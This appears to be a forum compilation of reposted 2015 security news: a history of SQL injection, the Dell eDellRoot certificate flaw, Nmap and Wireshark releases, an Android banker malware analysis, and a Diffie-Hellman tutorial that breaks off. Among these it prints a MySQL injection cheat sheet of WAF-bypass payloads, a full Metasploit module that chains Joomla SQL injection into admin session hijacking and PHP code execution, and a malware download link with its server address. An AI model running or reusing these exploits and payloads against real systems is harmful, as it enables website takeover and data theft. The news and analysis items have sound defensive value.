a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview. “When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.” But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data. An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said. Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, asecurity researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap. “It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added. When the attacker is looking for a target to hit in the first place, that's just as simple to automate too. Image: sqlmap “They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.” “You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input. If the solutions are fairly straight forward, why are SQLi-based attacks still happening? “The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email. Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it. So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening? “Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.” Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attacks, despite them being relatively straight forward to implement. Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said. So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.Ultimately, the responsibility of the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer. Sursa: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away

Superfish 2.0: Dangerous Certificate on Dell Laptops breaks encrypted HTTPS Connections tl;dr Dell laptops come preinstalled with a root certificate and a corresponding private key. That completely compromises the security of encrypted HTTPS connections. I've provided an online check, affected users should delete the certificate. It seems that Dell hasn't learned anything from the Superfish-scandal earlier this year: Laptops from the company come with a preinstalled root certificate that will be accepted by browsers. The private key is also installed on the system and has been published now. Therefore attackers can use Man in the Middle attacks against Dell users to show them manipulated HTTPS webpages or read their encrypted data. The certificate, which is installed in the system's certificate store under the name "eDellRoot", gets installed by a software called Dell Foundation Services. This software is still available on Dell's webpage. According to the somewhat unclear description from Dell it is used to provide "foundational services facilitating customer serviceability, messaging and support functions". The private key of this certificate is marked as non-exportable in the Windows certificate store. However this provides no real protection, there are Tools to export such non-exportable certificate keys. A user of the plattform Reddit has posted the Key there. For users of the affected Laptops this is a severe security risk. Every attacker can use this root certificate to create valid certificates for arbitrary web pages. Even HTTP Public Key Pinning (HPKP) does not protect against such attacks, because browser vendors allow locally installed certificates to override the key pinning protection. This is a compromise in the implementation that allows the operation of so-called TLS interception proxies. I was made aware of this issue a while ago by Kristof Mattei. We asked Dell for a statement two weeks ago and didn't get any answer. It is currently unclear which purpose this certificate served. However it seems unliklely that it was placed there deliberately for surveillance purposes. In that case Dell wouldn't have installed the private key on the system. Affected are only users that use browsers or other applications that use the system's certificate store. Among the common Windows browsers this affects the Internet Explorer, Edge and Chrome. Not affected are Firefox-users, Mozilla's browser has its own certificate store. Users of Dell laptops can check if they are affected with an online check tool. Affected users should immediately remove the certificate in the Windows certificate manager. The certificate manager can be started by clicking "Start" and typing in "certmgr.msc". The "eDellRoot" certificate can be found under "Trusted Root Certificate Authorities". This incident is almost identical with the Superfish-incident. Earlier this year it became public that Lenovo had preinstalled a software called Superfish on its Laptops. Superfish intercepts HTTPS-connections to inject ads. It used a root certificate for that and the corresponding private key was part of the software. After that incident several other programs with the same vulnerability were identified, they all used a software module called Komodia. Similar vulnerabilities were found in other software products, for example in Privdog and in the ad blocker Adguard. This article is mostly a translation of a German article I wrote for Golem.de. Image source and license: Wistula / Wikimedia Commons, Creative Commons by 3.0 Sursa: https://blog.hboeck.de/archives/876-Superfish-2.0-Dangerous-Certificate-on-Dell-Laptops-breaks-encrypted-HTTPS-Connections.html

mysql injection concat() replacements @sergey_lakantar select export_set(1,version(),user(),' : ',2); 5.1.7 : my_user select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2); 5.1.7 : my_user : my_db select make_set(7,version(),user(),schema()); 5.1.7,my_user,my_db select replace(make_set(7,version(),user(),schema()),',',' : '); 5.1.7 : my_user : my_db select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : '); 5.1.7 : my_user select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : '); 5.1.7 : my_user : my_db select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user()); 5.1.7 : my_user select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema()); 5.1.7 : my_user : my_db select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version()) 5.1.7 : my_user select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version()); 5.1.7 : my_user : my_db select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()); 5.1.7 : my_user select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema()); 5.1.7 : my_user : my_db group_concat() without comma- select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x); 5.1.7 : my_user : my_db concat() waf bypass- /*!50000group_coNcat(*/) /*!50000coNcat(*/) `coNcat`%0a%0b%0c%0d%a0() {snoopdogg concat()} {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}} concat-- a%0a() concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a) concat/**x**/() Modsecurity- concat+() Link: concat() replacements - Pastebin.com

Nmap 7 Released November 19, 2015 The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 7.00 from https://nmap.org/. It is the product of three and a half years of work, nearly 3200 code commits, and more than a dozen point releases since the big Nmap 6 release in May 2012. Nmap turned 18 years old in September this year and celebrates its birthday with 171 new NSE scripts, expanded IPv6 support, world-class SSL/TLS analysis, and more user-requested features than ever. We recommend that all current users upgrade. Contents: About Nmap Top 7 Improvements in Nmap 7 Press Screen Shots Detailed Improvements Moving Forward (Future Plans) Acknowledgments Download and updates Top 7 Improvements in Nmap 7 Before we get into the detailed changes, here are the top 7 improvements in Nmap 7: 1. Major Nmap Scripting Engine (NSE) Expansion As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Examples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details] 2. Mature IPv6 support IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details] 3. Infrastructure Upgrades We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details] 4. Faster Scans Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details] 5. SSL/TLS scanning solution of choice Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details] 6. Ncat Enhanced We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters. 7. Extreme Portability Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy. Link: https://nmap.org/7/

[h=3]Android malware drops Banker from PNG file[/h] Nowadays is malware trying to hide wherever it is possible to get under the radar of anti-virus companies. Lately I found Trojan dropper carrying malicious payload, encoded by base64, embedded inside an image file. It’s nothing special these days but it is very rare dropping technique. In the most cases are malware authors lazy enough to not even encrypt the payload file. [h=3]Analysis[/h] In the time of writing this blog post is this Trojan dropper still available to download from attacker server (hxxp://jackdojacksgot.ru/img/Update.apk). Based on VirusTotal is detection for this Trojan dropper very poor. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 1 VirusTotal detection [/TD] [/TR] [/TABLE] This malicious application masquerade itself as Adobe Flash Player. Based on alternative names I found in application resources malware name can be different in the other versions like: Viber New, App4porno,CommBank, My Online Security, Viber or Whatsapp. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 2 Possible Trojan dropper names [/TD] [/TR] [/TABLE] After launch, Trojan will immediately drop and request user to install Adobe Flash Player. But first let’s take a look on dropping technique. In app assets there is nothing else to drop other than image file. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 3 Trojan dropper assets [/TD] [/TR] [/TABLE] There is only one image of dices stored in assets, but it size is more than 3.6 MB and that’s bit suspicious. After inspecting the code application wasn’t dropping this PNG file. The Trojan dropper at first opens this image file and searches for delimiter string, in this case "12345678901234567890". Right after this delimiter is stored another application encoded by Base64. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 4 Dropping embedded malware [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 5 Binary view of PNG file [/TD] [/TR] [/TABLE] Decoded data are then stored on external storage as “prefix.apk” and demand to install. Decoded application, prefix.apk, is heavily obfuscated Android banker, stealing user credentials. After installation it requests user to activate Administrator rights for application. This is the simplest method that prevents to uninstall this Trojan. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 6 Banker install and device administrator request [/TD] [/TR] [/TABLE] If user tries to deactivate Administrator rights then is repeatedly asked to activate it again. There are two ways how to get rid of this nasty banker. Either by going to safe mode of your device and deactivate Administrator rights and uninstall it or by using Android Debug Bridge (adb) and uninstall it from your computer. Both apps Trojan dropper and dropped banker are the most probably obfuscated and protected by DexProtector. It’s very complicated to analyze it statically without any dynamical intervention. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 7 Code obfuscation [/TD] [/TR] [/TABLE] Banker can steal user login credentials or credit card information with phishing technique. When user opens his mobile banking application or just Google Play Store, malicious activity will be displayed on the top of the official application. This way user can be easily fooled and insert sensitive information to banker pop-up window. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 8 Bankers phishing windows [/TD] [/TR] [/TABLE] User credentials are immediately sent to remote server. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 9 Send stolen credentials for Gmail app [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 10 Send stolen credentials for CommBank app [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD] Figure 11 Send stolen credentials for PayPal app [/TD] [/TR] [/TABLE] This banker is very popular. Lately I tweeted about same banker but stored on different server. [h=3]More information[/h] HASH dropper: 1F41BA0781D51751971EE705DFA307D2 HASH PNG: 575551FBC343EC8E1A1C771D81963096 HASH dropped: 90886B56372F5191A78A20DCB3F9FE6E Download link: http://jackdojacksgot.ru/img/Update.apk Remote server: 75jng75ufnf.ru:2080 Posted by Lukas Stefanko at 11:47 PM Sursa: http://b0n1.blogspot.ro/2015/11/android-malware-drops-banker-from-png.html

Network protocol analyzer Wireshark 2.0 released Posted on 24 November 2015. Wireshark, the most popular network protocol analyzer, has reached version 2.0. It features a completely new user interface which should provide a smoother, faster user experience. Here's an in-depth video introduction to Wireshark 2.0 The libwireshark API has undergone some major changes: The emem framework (including all ep_ and se_ memory allocation routines) has been completely removed in favour of wmem which is now fully mature. The (long-since-broken) Python bindings support has been removed. If you want to write dissectors in something other than C, use Lua. Plugins can now create GUI menu items. Heuristic dissectors can now be globally enabled/disabled so heur_dissector_add() has a few more parameters to make that possible proto_tree_add_text has been removed. tvb_length() has been removed in favor of tvb_reported_length() and tvb_captured_length(). The API for ONC RPC-based dissectors has changed significantly: the procedure dissectors no longer take an offset, void-argument procedures now need to be declared with a function (use dissect_rpc_void()), and rpc_init_prog() now handles procedure registration too (it takes additional arguments to handle this; rpc_init_proc_table() was removed). The following features are new (or have been significantly updated) since version 2.0.0rc3: An RTP player crash has been fixed. Flow graph issues have been fixed. A Follow Stream dialog crash has been fixed. An extcap crash has been fixed. A file merge crash has been fixed. A handle leak crash has been fixed. Several other crashes and usability issues have been fixed. Sursa: http://www.net-security.org/secworld.php?id=19147

autopwn Specify targets and run sets of tools against them autopwn is designed to make a pentester's life easier and more consistent by allowing them to specify tools they would like to run against targets, without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well.. Installation It is recommended that you use the docker image while exposing TCP 5000 for autopwn clients to connect to. This is because the autopwn docker image is already setup (tools are installed and in the right place). Only allow this package to listen on a loopback IP address. If you have this package listen on a public IP, you're allowing arbitrary users to execute commands as root on your server. Eventually, HTTPS and credentials will be required, but for now, don't be a moron. From Docker Execute docker pull rascal999/autopwn Run docker run -i -t -p 127.0.0.1:5000:5000 rascal999/autopwn /usr/sbin/autopwn Run autopwn client (you can get the Java application at https://github.com/rascal999/autopwn-gui) From the Python Package Index (for development) Execute pip install autopwn From this repository Clone the Git repository Change into the newly created directory Execute pip install . Usage Running autopwn will start the web server. Sample output * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) * Restarting with stat 127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /ping HTTP/1.1" 200 - 127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /favicon.ico HTTP/1.1" 404 - In order to interface with autopwn you should use autopwn-gui (available at https://github.com/rascal999/autopwn-gui). You can also use autopwn-cli (available at https://github.com/rascal999/autopwn-cli). If you're interested in the API, you can also do stuff in the browser. Contributing Fork it! Create your feature branch: git checkout -b my-new-feature Commit your changes: git commit -am 'Add some feature' Push to the branch: git push origin my-new-feature Submit a pull request Credits Developed by Aidan Marlin (aidan [dot] marlin [at] nccgroup [dot] com) while working at NCC Group. I'd like to thank the following contributors for their work on previous autopwn versions: Selfegris 0xsauby berdario Sursa: https://github.com/nccgroup/autopwn

[h=1]Joomla Content History SQLi Remote Code Execution[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection vulnerability found in Joomla versions 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator component in the core of Joomla. Triggering the SQL injection makes it possible to retrieve active Super User sessions. The cookie can be used to login to the Joomla administrator backend. By creating a new template file containing our payload, remote code execution is made possible. }, 'License' => MSF_LICENSE, 'Author' => [ 'Asaf Orpani', # Vulnerability discovery 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'References' => [ [ 'CVE', '2015-7857' ], # Admin session hijacking [ 'CVE', '2015-7297' ], # SQLi [ 'CVE', '2015-7857' ], # SQLi [ 'CVE', '2015-7858' ], # SQLi [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ], [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 3.x <= 3.4.4', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 23 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/']) ], self.class) end def check # Request using a non-existing table res = sqli(rand_text_alphanumeric(rand(10)+6)) if res && res.body =~ /`(.*)_ucm_history`/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def sqli( tableprefix ) # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in). # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history. # This way we make sure that's excluded and we only get real admin sessions. sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)" # Retrieve cookies res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php"), 'vars_get' => { 'option' => 'com_contenthistory', 'view' => 'history', 'list[ordering]' => '', 'item_id' => '1', 'type_id' => '1', 'list[select]' => sql } }) return res end def exploit # Request using a non-existing table first, to retrieve the table prefix res = sqli(rand_text_alphanumeric(rand(10)+6)) if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end # Retrieve the admin session using our retrieved table prefix res = sqli("#{table_prefix}_") if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end # Retrieve cookies res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php") }) if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end # Modify cookie to authenticated admin auth_cookie = cookie_begin auth_cookie << "=" auth_cookie << auth_cookie_part auth_cookie << ";" # Authenticated session res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ print_status("#{peer} - Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end # Retrieve template view res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'view' => 'templates' } }) # We try to retrieve and store the first template found if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/ template_id = $1 file_id = $2 else fail_with(Failure::Unknown, "Unable to retrieve template") end filename = rand_text_alphanumeric(rand(10)+6) # Create file print_status("#{peer} - Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'task' => 'template.createFile', 'id' => template_id, 'file' => file_id, }, 'vars_post' => { 'type' => 'php', 'name' => filename } }) # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] print_status("#{peer} - Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', 'cookie' => auth_cookie ) # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 print_status("#{peer} - Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 print_status("#{peer} - Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end else fail_with(Failure::Unknown, "#{peer} - Creating file failed") end filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file print_status("#{peer} - Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'cookie' => auth_cookie, 'vars_get' => { 'option' => 'com_templates', 'view' => 'template', 'id' => template_id, 'file' => filename_base64, }, 'vars_post' => { 'jform[source]' => payload.encoded, 'task' => 'template.apply', token => '1', 'jform[extension_id]' => template_id, 'jform[filename]' => "/#{filename}.php" } }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") print_status("#{peer} - Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), 'cookie' => auth_cookie }) end end Sursa: https://www.exploit-db.com/exploits/38797/

A programmer wrote scripts to secretly automate a lot of his job — and email his wife and make a latte Julie Bort There's a hilarious project that's popular on GitHub, the website that hosts all kinds of software that programmers want to share with each other. The project was shared by a programmer named Nihad Abbasov, known as "Narkoz" on GitHub. It consists of a bunch of software scripts with some funny but NSFW names. Narkoz says that the scripts came from one of his coworkers who left for another company, the type of guy that "if something — anything — requires more than 90 seconds of his time, he writes a script to automate that." After the guy left for a new job, his former coworkers were looking through his work and discovered that the guy had automated all sorts of crazy things, including parts of his job, his relationships, and making coffee. The guy wrote one script that sends a text message "late at work" to his wife and "automatically picks reasons" from a preset list of them, saysNarkoz. It sent this text anytime there was activity with his login on the company's computer servers after 9 p.m. He wrote another script relating to a customer he didn't like, given the not-nice name he chose for this script. It scans his inbox for an email from the customer that uses words like "help," "trouble," and "sorry" and automatically rolls the guy's database to the latest backup, then sends a reply: "No worries mate, be careful next time." With another script, he automatically fired off an email excuse like "not feeling well, working from home" if he wasn't at work and logged in to the servers by 8:45 a.m. He called that script "hangover." And the best one? He wrote a script that waits 17 seconds, then hacks into the coffee machine and orders it to start brewing a latte. The script tells the machine to wait another 24 seconds before pouring the latte into a cup, the exact time it takes to walk from the guy's desk to the coffee machine. And his coworkers didn't even know the coffee machine was on the network and hackable. Sursa: http://www.businessinsider.com/programmer-automates-his-job-2015-11

As a side project I have been doing some self-study on encryption to better understand it. It is how we protect our data as it travels across the internet or when at rest, we use concepts from it to verify that we sent messages, and whole currency schemes are built around the idea. Encryption is an incredibly dense topic and it is easy to mess up. As such, all of the code I have written should not be used for any real encryption. The goal here is to make some of the concepts easier to understand. For those interested in learning more about the history, I quite enjoyed The Code Book. As for a more in-depth understanding of cryptography, take a look at Cryptography Engineering. Then you and I can struggle through it together! Diffie-Hellman Key Exchange The first topic for encryption we will go over is the Diffie-Hellman Key Exchange (DHKE). I think there is no better way to explain the basics than how Wikipediadoes, specifically in the image below. Alice and Bob want to share a key to encrypt their communications. Using paint (instead of math) we think of it like so: Alice and Bob decide on a common paint color Alice and Bob pick their own secret paint color Alice and Bob combine their secret color with the common color Alice and Bob trade this mixed paint Alice mixes Bob’s paint with her secret color Bob mixes Alice’s paint with his secret color Now Alice and Bob have a shared secret color (Alice and Bob will be recurring characters so you will have to get used to them!) DHKE described using paint (courtesty Wikipedia) The Key This section is more of a big picture section, so if you already have a basic understanding of encryption feel free to move on (or not, maybe you enjoy reading what I write). A key, in cryptography, is used to lock and unlock a message. But imagine trying to share a key and send a message to someone via a courier. If the message is clear text, the courier can read it. So we encrypt it. How do we then share a key with that person to decrypt it? If we just send the key, then the courier has that also and can decrypt it. DHKE aims to solve that problem. Let’s take a look at a working example. A Working Example I wrote some code to handle this which you can find here. Below is the output you can see from running it (with some flags to make it more verbose). DHKE between Alice and Bob A note on my iconography: x -> y : means x sends a message to y Internal means that it is occurring locally for that person First Alice tells Bob to set his prime base to 5 (and Eve, who is attempting to eavesdrop, sees this). Then Alice tells Bob to set his prime mod to 23 (which Eve also sees). Then both Alice and Bob create a random secret and perform a calculation using that secret and the prime base and prime mod. Then Alice tells Bob the result of her calculation and vice versa (and Eve sees both of these). Finally they perform one more set of calculations and arrive at a shared secret. DHKE In Math So how does this actually work? Modular arithmetic to the rescue! The equation that we are looking at is g^x mod p. g and p combine (sort of) to make our common paint. There are some restrictions around what numbers we are allowed to choose for g and x, one of which I discuss later, but we do know that p is prime. x is where this gets interesting. Alice and Bob will each select their own secret number for this (their secret paint as it were), a and b respectively. This can be any number. Then each calculates g^x mod p, and shares it (their mixed paint). Now Alice has g^b mod p (B from now on) from Bob and Bob has g^a mod p (A from now on) from Alice (Eve would have these as well). Then each takes their secret key and combines it mod p with the number they received. So Alice has B^a mod p and Bob has A^b mod p, which is their secret key. Wait, B^a mod p and A^b mod p are the secret keys? That must mean they are the same value! How cool is that? Let’s go back through the steps to understand it better. Alice and Bob decide on two numbers g and p. Alice and Bob select a secret number, a and b respectively Alice and Bob calculate g ^ x mod p where x is their number Alice and Bob share these numbers (A and Alice and Bob combine the shared number with their secret to generate the shared secret So let’s look at what we have at step 5: Alice has: B^a mod p = (g^b mod p) ^ a mod p = g^ab mod p Bob has: A^b mod p = (g^a mod p) ^ b mod p = g^ab mod p You might be saying, I still don’t get why that works. This is where a deeper understanding of modular arithmetic comes in handy. I will walk you through some of the basics (or not, if you have already had enough math, but I would say soldier on, you only need elementary math knowledge for the most part). When we calculate something like y mod z what we are really calculating is the remainder of y / z (or y % z in a lot of programming languages). When y < z then y % z is y. When it is larger it works like a clock. As y grows y % z will go through all values 0 to z – 1 until it is a multiple of z and then it will go back to 0 and then it will proceed through all of those values again. It turns out that the exponentiation operation in modular arithmetic is transitive. So (a ^ ^ c mod d = (a ^ c) ^ b mod d = a^ (bc) mod d. So Alice is calculating (g^b mod p) ^ a mod p which is (g^^a mod p. From that, both sides end up having g^ab mod p. This is where one of the restrictions on g and p comes in. For a ^ b mod c, the possible results can be limited depending on the numbers selected. Let’s look at an example: a ^ b mod 7. 2 ^ 1 mod 7 = 2 mod 7 = 2 2 ^ 2 mod 7 = 4 mod 7 = 4 2 ^ 3 mod 7 = 8 mod 7 = 1 2 ^ 4 mod 7 = 16 mod 7 = 2 2 ^ 5 mod 7 = 32 mod 7 = 4 2^ 6 mod 7 = 64 mod 7 = 1 … See where that is an issue? It only results in 3 numbers which means that the possible secret keys are only half of all numbers less than 7 can be a key (and limiting the key space is a bad thing!). So instead we pick a number like 3: 3 ^ 1 mod 7 = 3 mod 7 = 3 3 ^ 2 mod 7 = 9 mod 7 = 2 3 ^ 3 mod 7 = 27 mod 7 = 6 3 ^ 4 mod 7 = 81 mod 7 = 4 3 ^ 5 mod 7 = 243 mod 7 = 5 3^ 6 mod 7 = 729 mod 7 = 1 …. Here we can see that 3^x mod 7 can be any number less than 7, so our key space is larger. If you want to learn more about 